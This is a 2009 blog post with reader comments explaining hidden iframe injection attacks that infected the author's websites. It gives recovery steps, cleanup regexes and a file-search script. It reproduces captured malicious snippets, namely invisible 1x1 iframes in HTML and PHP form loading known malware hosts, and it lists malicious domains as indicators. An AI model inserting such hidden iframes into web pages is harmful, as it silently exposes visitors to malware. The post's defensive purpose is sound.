[Updated on October 27, 2009 with new a version of the script]
It is a shame that after all those posts about security, some of my websites were under attack today.
Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack.
All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.
To the html pages the following piece of code was added:
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
To php pages it added:
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Asha took the effort and cleaned most of the infected files. We are monitoring the status now.
How did the worm inject the hidden iframes to my files?
There are two ways through which the worm is believed to infect your files:
1) Server is compromised
This is the most common way. Some o the websites residing in the same web server as your website may be compromised (o it may be some vulnerabilities in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites in the server.
2) Client side FTP
The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.
When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.
How can I recover from a hidden iframe injection attack?
Here are a few tips that might help you:
- The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
- Notify your web host about the attack and advice them to take measures against a possible server wide attack.
- Change the file permissions in your server to the maximum secure mode.
- Download all your files from the server and check for infections. Clean the infected files.
- Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
- Never use public computers to access your server.
How do I clean infected files?
Use these regular expressions to search for all pages containig the malicious code and replace it with space:
<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;
You may have to write a script to automate this for all the files in the server.
I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.
You may want to change some hardcoded values inside the file.
Then visit the url:
http://www.yourdomain.com/clean.php?c=iframe
The parameter c specifies the text to search for inside the file. The results will be something like:
It will search all the files in your website and if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.
Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.
Will my search engine rankings be affected by this attack?
Try to be fast with these steps because if a visitor see the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave way for more sophisticated attacks.
Google will mark your site in it’s search results with a warning: “This site may harm your computer”.
Use the following link to see what google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
As mentioned above, you must remove the malware from your local machine using some antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.
Note that when visiting an infected site, some antivirus softwares prompt you that “Trojan Horse Downloader”, an exe-file is trying to get loaded. Once the exe infects your machine, it will infect your server too.
Here are some more code samples caught from the wild:
<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>
There are obfuscated versions of the attack code too:
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.
Here is a list of some other websites that host malicious content:
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net/
http://live-counter.net
http://klinoneshoes.info
protection-livescan.com/
http://webexperience13.com
http://q5x.ru
http://q5x.rugumblar.cnmartuz.cnbeladen.net38zu.cngoogleanalytlcs.netlousecn.cnfqwerz.cnd99q.cnorgsite.info94.247.2.094.247.2.195http://mmsreader.comhttp://google-ana1yticz.comhttp://my2.mobilesect.infohttp://thedeadpit.comhttp://internetcountercheck.comhttp://165.194.30.123http://ruoo.infogogo2me.net/http://live-counter.nethttp://klinoneshoes.infoprotection-livescan.com/http://webexperience13.comhttp://q5x.ru
If you find these urls in any code in your website, that is a sure shot sign that you are infected.
[...] suspicious, I google about it. Then I find this post: http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/. I finally know that the script was added somehow to my files by a virus. Yes, it is my own [...]
Hey, I’ve made a wordpress plugin that will block (not remove) the script from being executed.
Check at http://www.nazieb.com/466/blocks-the-annoying-goooogleadsencebiz-iframe/. (beta version)
It’s totally free.
I have had a dozen sites infected, and my experience so far is that:
it targets any file with “index” in the file name. it also targets any file with “main” in the file name. my iframes were pointing to chinese ads.
@Dave,
I bought your script and it worked, thanks! You saved me a bunch of time trying to write the script myself, well worth every penny.
One modification that I made was to include other sources–I had iframes pulling from 3 different sources rather than just goooogleadsence.biz.
Also the hackers target in addition to pages named index, home and default, pages named main, as well as cms specific pages like Drupals maintenance-page.tpl.php and MovableTypes php/extlib/smarty/libs/plugins/modifier.default.php.
Hope that helps somebody.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
[...] friend Niyaz was bugging me for a while now, asking me to write an asp.net code for removing malicious code from [...]
I guess all of you are using Total Commander with saved passwords? The virus is stealing your saved passwords, nothing else.
hey guys,
i had the same problem in most of my sites on the server. Until i’ll find who’s responsible for injecting those iframes i changed all of index & home pages rights to r–r–r– and as far as now everything seems to be ok.
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ [...]
I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.
Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.
Cheers
Akash
[...] Hidden iframe injection attacks | Diovo [...]
I got infected too. I found the tool to remove the infection…
i think it is here
http://www.sulumitsretsambew.org/iframe-worms/
Hi,
Another one hosting malicious code is xcount.cc which have infected my site.
Hello, my site is got infected too by this virus iframe…is there any script that can remove that virus? thanks
Thank you very much. My Web site was infected with this worm and following your indications I have been able to eliminate it. THANKS again.
spiderx that worm removal tool is actualy here
http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/
thank you very much, i finally removed this thing.
Thanks for the info and the script. Your script is quite useful.
I have had the same issue with this worm, it has been driving me nuts. I currently use FTP Commander to access my site and I have not had a problem since. It only attacks the index.php files and adds the iframe code at the end of the script, and corrupts it. I only seemed to have the issue when I used Internet Explorer to access my FTP folders. You will need to immediately change your FTP password, and use another software package to edit your FTP site other than IE. This has gotten me many times within the last week.
Your clean.php file is a big help on finding these issues. thanks.
@Garrett,
Glad it helped!
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ http://blog.tigertech.net/posts/ftp-virus-spreading/ [...]